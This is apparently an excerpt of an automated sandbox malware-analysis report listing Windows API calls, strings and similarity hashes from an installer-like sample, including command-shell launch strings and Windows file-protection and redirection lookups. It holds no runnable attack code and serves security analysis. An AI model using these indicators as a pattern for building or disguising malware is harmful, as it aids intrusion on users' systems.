                                                                                • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                • String ID: c:\directory$shell32.dll$%H
                                                                                • API String ID: 3376378930-166502273
                                                                                • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59

Control-flow Graph

control_flow_graph 2739 42f560-42f56a 2740 42f574-42f5b1 call 402b30 GetActiveWindow GetFocus call 41eea4 2739->2740 2741 42f56c-42f56f call 402d30 2739->2741 2747 42f5c3-42f5cb 2740->2747 2748 42f5b3-42f5bd RegisterClassA 2740->2748 2741->2740 2749 42f652-42f66e SetFocus call 403400 2747->2749 2750 42f5d1-42f602 CreateWindowExA 2747->2750 2748->2747 2750->2749 2751 42f604-42f648 call 42427c call 403738 CreateWindowExA 2750->2751 2751->2749 2758 42f64a-42f64d ShowWindow 2751->2758 2758->2749
APIs
• GetActiveWindow.USER32 ref: 0042F58F
• GetFocus.USER32 ref: 0042F597
• RegisterClassA.USER32(004997AC), ref: 0042F5B8
• CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
• CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
• ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
• SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Window$CreateFocus$ActiveClassRegisterShow
• String ID: TWindowDisabler-Window
• API String ID: 3167913817-1824977358
• Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
• Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
• Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
• Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• API String ID: 1646373207-2130885113
• Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
• Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
• Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
• Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
APIs
• RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
• RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
• GetCurrentThreadId.KERNEL32 ref: 00430971
• GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
• String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
• API String ID: 4130936913-2943970505
• Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
• Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
• Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
• Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
APIs
• GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
  • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
  • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
  • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
  • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
• String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
• API String ID: 854858120-615399546
• Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
• Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
• Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
• Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
APIs
• LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
• GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
• OemToCharA.USER32(?,?), ref: 0042375C
• CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Char$FileIconLoadLowerModuleName
• String ID: 2$MAINICON
• API String ID: 3935243913-3181700818
• Opcode ID: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
• Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
• Opcode Fuzzy Hash: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
• Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
APIs
• GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
• GetCurrentThreadId.KERNEL32 ref: 00418F79
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
  • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
  • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
  • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
  • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
  • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
  • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
  • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
  • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
  • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
  • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
  • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
  • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
• String ID: ControlOfs%.8X%.8X$Delphi%.8X
• API String ID: 316262546-2767913252
• Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
• Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
• Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
• Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                APIs
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: LongWindow$Prop
• String ID:
• API String ID: 3887896539-0
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
Strings
• PendingFileRenameOperations2, xrefs: 00455784
• PendingFileRenameOperations, xrefs: 00455754
• WININIT.INI, xrefs: 004557E4
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
• API String ID: 47109696-2199428270
APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
• GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: Created temporary directory: $\_setup64.tmp$_isetup
• API String ID: 1375471231-2952887711
APIs
• EnumWindows.USER32(00423A1C), ref: 00423AA8
• GetWindow.USER32(?,00000003), ref: 00423ABD
• GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
• SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
Similarity
• API ID: Window$EnumLongWindows
• String ID: \AB
• API String ID: 4191631535-3948367934
APIs
• RegDeleteKeyA.ADVAPI32(?,00000000), ref: 0042DE50
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003), ref: 0042DE6B
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
Similarity
• API ID: AddressDeleteHandleModuleProc
• String ID: RegDeleteKeyExA$advapi32.dll
• API String ID: 588496660-1846899949
Strings
• PrepareToInstall failed: %s, xrefs: 0046BE6E
• NextButtonClick, xrefs: 0046BC4C
• Need to restart Windows? %s, xrefs: 0046BE95
Similarity
• API ID:
• String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
• API String ID: 0-2329492092
APIs
• SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
• SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
Similarity
• API ID: ActiveChangeNotifyWindow
• String ID: $Need to restart Windows? %s
• API String ID: 1160245247-4200181552
APIs
  • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
• GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
• SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
• SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
Similarity
• API ID: ChangeNotify$ErrorFullLastNamePath
• String ID: Creating directory: %s
• API String ID: 2451617938-483064649
APIs
• GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
Similarity
• API ID: AddressByteCharMultiProcWide
• String ID: SfcIsFileProtected$sfc.dll
• API String ID: 2508298434-591603554
APIs
• 754B1520.VERSION(00000000,?,?,?,?), ref: 00452530
• 754B1500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,?), ref: 0045255D
• 754B1540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,?), ref: 00452577
Similarity
• API ID: B1500B1520B1540
• String ID: %E
• API String ID: 624677603-175436132
APIs
• GetDC.USER32(00000000), ref: 0044B401
• SelectObject.GDI32(?,00000000), ref: 0044B424
• ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                Similarity
                                                                                • API ID: ObjectReleaseSelect
                                                                                • String ID: %H
                                                                                • API String ID: 1831053106-1959103961
                                                                                • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
• DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
• DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: DrawText$ByteCharMultiWide
• String ID: %H
• API String ID: 65125430-1959103961
• Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
• Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
• Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
• Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
APIs
• SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 395431579-1506664499
• Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
• Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
• Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
• Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
Strings
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
• PendingFileRenameOperations2, xrefs: 00455A4F
• PendingFileRenameOperations, xrefs: 00455A40
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
• API String ID: 47109696-2115312317
• Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
• Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
• Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
• Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
• FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
• FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
• FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
• Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
• Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
• Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
APIs
• FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
• FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
• FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
